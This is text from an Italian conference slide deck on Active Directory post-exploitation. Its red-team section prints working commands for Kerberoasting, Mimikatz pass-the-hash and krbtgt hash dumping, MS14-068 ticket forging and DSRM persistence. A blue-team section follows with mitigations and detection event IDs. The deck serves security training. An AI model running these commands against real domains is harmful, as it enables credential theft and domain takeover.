the dark side of active directory - copia · 2015-12-02 · the dark side of active directory ......

presenta

The Dark Side of Active DirectoryPost-Exploitation like a boss without exploit

Guglielmo Guglielmo Guglielmo Guglielmo ScaiolaScaiolaScaiolaScaiolaMCSE MCSE MCSE MCSE –––– CEI CEI CEI CEI –––– CEH CEH CEH CEH –––– CHFI CHFI CHFI CHFI –––– ECSA ECSA ECSA ECSA ---- ISO 27001 L.A. ISO 27001 L.A. ISO 27001 L.A. ISO 27001 L.A. –––– Security +Security +Security +Security +

[email protected] [email protected] [email protected] [email protected] @@@@SoftwarGSSoftwarGSSoftwarGSSoftwarGS

Guglielmo «S0ftwar» Scaiola

@S0ftwarGS

Security Consultant & Ethical Hacker

Microsoft System Engineer – A.D. expert

Trainer & Speaker

Some MC* & other certification…

Computer addicted for fun and profit….☺

www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 2

Agenda

• ConsiderazioniConsiderazioniConsiderazioniConsiderazioni inizialiinizialiinizialiiniziali�Perchè?Perchè?Perchè?Perchè?�UnUnUnUn po’po’po’po’ didididi statistichestatistichestatistichestatistiche............�LeLeLeLe basibasibasibasi

• IlIlIlIl latolatolatolato oscurooscurooscurooscuro delladelladelladella forzaforzaforzaforza :::: RedRedRedRed TeamTeamTeamTeam• MitigazioneMitigazioneMitigazioneMitigazione eeee detectiondetectiondetectiondetection :::: BlueBlueBlueBlue TeamTeamTeamTeam• QQQQ &&&& AAAA



Enterprise A.D.

Blue or Red?Pink...


Il lato oscuro della Forza :Red Team


• Recon (Scanning & Enumeration)

• Gaining Access

• Maintaining Access� Privilege escalation� Backdoor� Movimenti laterali

� Recon (Scanning & Enumeration)� Gaining Access

� Pivoting� Recon (Scanning & Enumeration)� Gaining Access

• Covering Tracks


How to gain access?


RAT remote access tools

• Delivery

• Staging e C2 (Multi protocol HTTP, HTTPS, DNS, SMB,...)

• Anti-forensics

• Bypass AV,firewall, log e IDS/IPS

• Survive to proxy – proxy awareness (detect & utilize proxies)


Old School Vs. New School

• Old School � Exploit to gain access from external (Metasploit or other exploit)� Shell / reverse shell� Tunnel� AV evasion

• New School� Exploit to gain access from external (RAT) + C2� Tools da Sysadmin � Powershell (no AV detection)


Recon


Recon

• Users� Dsquery users� Net user

• Computers� Dsquery computer

• Domain Controllers� Dsquery server

• Password Policy� net accounts� Get-ADDefaultDomainPasswordPolicy -Identity MyDomain.local

• Group Membership (Administrators,Domain Admins,...)� Dsquery group� Net localgroup� Net group


Il lato oscuro della forza


Warm-Up : Rename Administrator account?

• Psgetsid

• Net localgroup administrators


DSRM Password

• Chi ricorda la password del DSRM?Chi ricorda la password del DSRM?Chi ricorda la password del DSRM?Chi ricorda la password del DSRM?

• Facile o difficile? (può essere indovinata?)Facile o difficile? (può essere indovinata?)Facile o difficile? (può essere indovinata?)Facile o difficile? (può essere indovinata?)

• Reboot Reboot Reboot Reboot del serverdel serverdel serverdel server. + Accesso fisico (o ILO) . + Accesso fisico (o ILO) . + Accesso fisico (o ILO) . + Accesso fisico (o ILO)

• Quindi è improbabile che qualcuno ne possa Quindi è improbabile che qualcuno ne possa Quindi è improbabile che qualcuno ne possa Quindi è improbabile che qualcuno ne possa abusare, vero?abusare, vero?abusare, vero?abusare, vero?

• Quando la usate? ...e cosa succede se non è Quando la usate? ...e cosa succede se non è Quando la usate? ...e cosa succede se non è Quando la usate? ...e cosa succede se non è quella che vi aspettavate? (cosa succede se la quella che vi aspettavate? (cosa succede se la quella che vi aspettavate? (cosa succede se la quella che vi aspettavate? (cosa succede se la resetta un attaccante?)resetta un attaccante?)resetta un attaccante?)resetta un attaccante?)


Real World Enterprise


Privilege Escalation


www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it

SPN

setspn setspn setspn setspn ----s http/srv2k12r2.2k12.lan websvcs http/srv2k12r2.2k12.lan websvcs http/srv2k12r2.2k12.lan websvcs http/srv2k12r2.2k12.lan websvc

SPN PurposeSPN PurposeSPN PurposeSPN PurposeA service principal name (SPN) is the name by which a Kerberos client uniquely identifies an instance of a service for a given Kerberos target computer.

SPN FormatSPN FormatSPN FormatSPN Formatserviceclassserviceclassserviceclassserviceclass////hosthosthosthost::::portportportport servicenameservicenameservicenameservicenameserviceclass and host are required, but port andservice name are optional. The colon between host and port is only required when aportis present.

22

Users o Computers?


Requesting tickets (slide stolen to @timmedin ☺)


L’attacco...(no demo...)

• Find service accounts� Setspn –T domainname –F –Q */*� In alternativa : C:\Tools\kerberoast-master\GetUserSPNs.ps1

• Identify user accounts, ignore computer accounts� GetUserSPNs.ps1 estrae direttamente gli users

• Request tickets (powershell)� Add-Type –AssemblyName System.IdentityModel� New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken

–ArgumentList "http/srv2k12r2.2k12.lan"


L’attacco...(2) (https://github.com/nidem/kerberoast)

• Request Ticket(s)Request Ticket(s)Request Ticket(s)Request Ticket(s)

• One ticket:PS C:> Add-Type -AssemblyName System.IdentityModelPS C:> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

• All the tickets PS C:> Add-Type -AssemblyName

System.IdentityModelPS C:> setspn.exe -T medin.local -Q / | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

• Extract the acquired tickets from ram with MimikatzExtract the acquired tickets from ram with MimikatzExtract the acquired tickets from ram with MimikatzExtract the acquired tickets from ram with Mimikatz

• mimikatz # kerberos::list /export

• Crack with rgsrepcrackCrack with rgsrepcrackCrack with rgsrepcrackCrack with rgsrepcrack

• ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

• RewriteRewriteRewriteRewrite

• Make user appear to be a different user./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

• Add user to another group (in this case Domain Admin)./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

• Inject back into RAM with MimikatzInject back into RAM with MimikatzInject back into RAM with MimikatzInject back into RAM with Mimikatz

• kerberos::ptt sql.kirbiwww.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 26

Gestione delle password degli admin locali via GPP



• The security update addresses the vulnerability by removing the ability to configure and distribute passwords that use certain Group Policy preferences extensions

Gain local admin privs via GPP

https://technet.microsoft.com/library/security/ms14-02528

Privilege escalation –local - GPP

Ms14-068


Ms14-068kekeo


If fail :runas /noprofile /netonly /user:idontcare cmdms14068.exe /domain:child1.newtest.lab /user:ut001 /password:Ut1Passw0rd /ptt

Persistence


DSRM Password

• https://technet.microsoft.com/it-it/library/cc754363(v=ws.10).aspx


DSRM Password

• https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx

• HKLMHKLMHKLMHKLM\\\\SystemSystemSystemSystem\\\\CurrentControlSetCurrentControlSetCurrentControlSetCurrentControlSet\\\\ControlControlControlControl\\\\LsaLsaLsaLsa\\\\DSRMAdminLogonBehaviorDSRMAdminLogonBehaviorDSRMAdminLogonBehaviorDSRMAdminLogonBehavior



• Mimikatz (su DC)

• Token::elevate

• Lsadump::sam

• DA EXT

• Mimikatz “privilege::debug” “sekurlsa::pth /domain:ADSDC03 /user:Administrator /ntlm:7c08d63a2f48f045971bc2236ed3f3ac” exit

DSRM Password

Mimikatz –dump cleartext password


Dump password hash

Dump password with mimikatz

lsadump::lsa /inject /name:krbtgt

lsadump::lsa

lsadump::lsa /patch

lsadump::lsa

lsadump::lsa /patch

DCSync


DCSync:1) Discovery DC2) Query replicate the user cred via GetNCChange

Intermezzo

Mimikatz –pass-the-hash


42

Mimikatz – over-pass-the-hash

• From AD online – mimikatz• lsadump::lsa /inject /name:administrator

• From NTDS.DIT e System hive Offline • NTDSXtract

• From client LSASS memory – mimikatz• sekurlsa::ekeys

mimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exitmimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exitmimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exitmimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab/ntlm:a87f3a337d73085c45f9416be5787d86" exit

Silver ticket

• È un TGS

• Il vantaggio è che non c’è comunicazione col DC quando lo si usa

• Non «piace» perchè la password dell’account computer cambia ogni 30 giorni

• While a Golden ticket is encrypted/signed with the domain Kerberos service account (KRBTGT), a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer ’s local SAM or service account credential).

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1


Mimikatz –silver ticket e DC


Mimikatz –Golden Ticket


ADMT & SID History


Active Directory Persistence : SID History


Real World Enterprise


Skeleton key


AdminSDHolder


Malicious Security Provider

• HKLM\System\CurrentControlSet\Control\Lsa\Security Packages


Mitigazione e Detection :Blue Team



Destinati alla sconfitta?• Gli attacchi sono cambiati:

� Non più l’evento in sè è malevolo (il «come»)� E’ malevola la correlazione :

� Chi ha fatto questa cosa?

� Da che host è stata fatta?

� Quando?

• Mitigare e loggare/correlare

• Ogni attacco che abbiamo visto nelle due sessioni lascia una traccia nei log.

• Dobbiamo implementare sistemi che alzino alert alla presenza di un certo evento o di un certo numero di eventi e che eventualmente li correlino (SIEM?)

E’ finito il tempo di security = AV + firewall


Lavorare insieme...


• Thinking an Active Directory domain is the security Thinking an Active Directory domain is the security Thinking an Active Directory domain is the security Thinking an Active Directory domain is the security boundaryboundaryboundaryboundary

• Deploying systems with default settingsDeploying systems with default settingsDeploying systems with default settingsDeploying systems with default settings....

• Too many Domain Too many Domain Too many Domain Too many Domain AdminsAdminsAdminsAdmins

• Not tracking/monitoring/documenting delegated access to Active Not tracking/monitoring/documenting delegated access to Active Not tracking/monitoring/documenting delegated access to Active Not tracking/monitoring/documenting delegated access to Active DirectoryDirectoryDirectoryDirectory

• OverOverOverOver----permissioned Service permissioned Service permissioned Service permissioned Service AccountsAccountsAccountsAccounts

• Service Accounts with passwords less than 20 Service Accounts with passwords less than 20 Service Accounts with passwords less than 20 Service Accounts with passwords less than 20 characterscharacterscharacterscharacters

• Using Group Policy Preferences to manage Using Group Policy Preferences to manage Using Group Policy Preferences to manage Using Group Policy Preferences to manage credentialscredentialscredentialscredentials

• Running nonRunning nonRunning nonRunning non----essential roles and services on Domain essential roles and services on Domain essential roles and services on Domain essential roles and services on Domain ControllersControllersControllersControllers

• Domain Controllers not patched Domain Controllers not patched Domain Controllers not patched Domain Controllers not patched promptly & promptly & promptly & promptly & Unpatched systems (Unpatched systems (Unpatched systems (Unpatched systems (srv srv srv srv & & & & wks)wks)wks)wks)

• Domain Controllers not running a “recent” OS Domain Controllers not running a “recent” OS Domain Controllers not running a “recent” OS Domain Controllers not running a “recent” OS versionversionversionversion

• The same local Administrator account passwords on multiple The same local Administrator account passwords on multiple The same local Administrator account passwords on multiple The same local Administrator account passwords on multiple computerscomputerscomputerscomputers

• Active Directory Admins logging on to untrusted Active Directory Admins logging on to untrusted Active Directory Admins logging on to untrusted Active Directory Admins logging on to untrusted systemssystemssystemssystems

• Not monitoring admin group Not monitoring admin group Not monitoring admin group Not monitoring admin group membershipmembershipmembershipmembership

• Not cleaning up admin group membershipNot cleaning up admin group membershipNot cleaning up admin group membershipNot cleaning up admin group membership

• Not automatically removing inactive (stale) user and computer accountsNot automatically removing inactive (stale) user and computer accountsNot automatically removing inactive (stale) user and computer accountsNot automatically removing inactive (stale) user and computer accounts

• Keeping Keeping Keeping Keeping legacy authentication active on the network (LM/NTLMv1legacy authentication active on the network (LM/NTLMv1legacy authentication active on the network (LM/NTLMv1legacy authentication active on the network (LM/NTLMv1))))

• Being too trusting Being too trusting Being too trusting Being too trusting –––– Too many Trusts or Trusts without proper security Too many Trusts or Trusts without proper security Too many Trusts or Trusts without proper security Too many Trusts or Trusts without proper security controlscontrolscontrolscontrols

The Most Common Active Directory Security Issues and What You Can Do to Fix Them by Sean Metcalf

https://adsecurity.org/?p=168457


• Controllo accesso amministrativo, anche per pochi minuti (chi?quando?perchè? Loggo cosa fa?)

• Service account a basso privilegio e con password complesse

• Accesso amministrativo a A.D. solo da alcuni client sicuri, no accessi amministrativi da altri client

• No privilegi di amministratore locale agli utenti

• «Igiene» del Token

• Considerare il Dominio e non la Foresta come perimetro di sicurezza

• No stessa password di amministratore locale su più host

• Si UAC

• No powershell dove non serve

• No password in GPP/GPO, batch, file, etc...

• No S.O. Legacy (per quanto possibile in produzione)

• Patch del S.O. E delle applicazioni (soprattutto lato client)

Decalogo...all’italiana


• DSRM Password� Id 4729 – set DSRM administrator password� Monitorare la chiave HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior

• DC Sync � Creare una allow list degli IP dei DC e monitorare DsGetNCChange da IP non nella lista

• Malicious Security Support Provider� Monitorare la chiave HKLM\System\CurrentControlSet\Control\Lsa\SecurityPackages

• SID History� Monitorare chi ha l’attributo settato e le sue eventuali modifiche

• AdminSDHolder� Monitorare le ACL dell’oggetto AdminSDHolder� Monitorare utenti e gruppi con AdminCount=1

• Golden/Silver Ticket – MS14-068� Event ID 4624 (account logon)-4672(admin Logon)-4634(account logoff ) possono contenere il

campo account domain con FQDN e non con lo short name oppure averlo blank (o con stringhe caratteristiche) PER ORA!!!PER ORA!!!PER ORA!!!PER ORA!!!

Detection


Microsoft Advanced Threat Analytics


• https://adsecurity.org

• http://blog.harmj0y.net/

• http://blog.gentilkiwi.com/mimikatz (meglio seguirlo su twitter)

• http://www.powershellempire.com

• http://www.labofapenetrationtester.com/

• Ma soprattutto Twitter, Twitter e Twitter...

Il segreto : la conoscenza – il nemico : l’ignoranza

Q & A

Domande e RisposteDomande e RisposteDomande e RisposteDomande e Risposte


Corsi consigliati

OEC217 - PenTesting Techniques

EC001 - EC-Council Ethical Hacking & Countermeasures – CEH

OEC208 - Security for Network & System Administrators

Per il futuro : corso di 2-3 giornate su security Active Directory


Tnx to :

• Passingthehash Passingthehash Passingthehash Passingthehash ---- @@@@passingthehashpassingthehashpassingthehashpassingthehash

• Joe Bialek Joe Bialek Joe Bialek Joe Bialek ---- @JosephBialek@JosephBialek@JosephBialek@JosephBialek

• Sylvain Sylvain Sylvain Sylvain Monné Monné Monné Monné ---- @@@@BiDOrDBiDOrDBiDOrDBiDOrD

• Chris Chris Chris Chris Gates Gates Gates Gates ---- @carnal0wnage@carnal0wnage@carnal0wnage@carnal0wnage

• Matt NMatt NMatt NMatt N. . . . ---- @enigma0x3@enigma0x3@enigma0x3@enigma0x3

• Will Schroeder Will Schroeder Will Schroeder Will Schroeder ---- @harmj0y@harmj0y@harmj0y@harmj0y

• Justin Warner Justin Warner Justin Warner Justin Warner ---- @sixdub@sixdub@sixdub@sixdub

in particolare a Benjamin Delpy in particolare a Benjamin Delpy in particolare a Benjamin Delpy in particolare a Benjamin Delpy ---- @gentilkiwi per il suo supporto e @gentilkiwi per il suo supporto e @gentilkiwi per il suo supporto e @gentilkiwi per il suo supporto e a a a a Sean Metcalf Sean Metcalf Sean Metcalf Sean Metcalf ---- @@@@PyroTek3 per tutto il materiale da lui messo a PyroTek3 per tutto il materiale da lui messo a PyroTek3 per tutto il materiale da lui messo a PyroTek3 per tutto il materiale da lui messo a disposizionedisposizionedisposizionedisposizione

Stay Tuned... : @S0ftwarGS@S0ftwarGS@[email protected] – [email protected] - +39 02 365738.11 - #wpc15it 65

Contatti OverNetEducation

OverNetOverNetOverNetOverNet EducationEducationEducationEducationinfo@overneteducation.itwww.overneteducation.itTel. 02 365738

@overnetewww.facebook.com/OverNetEducationwww.linkedin.com/company/overnet-solutionswww.wpc2015.it


the dark side of active directory - copia · 2015-12-02 · the dark side of active directory ......

Documents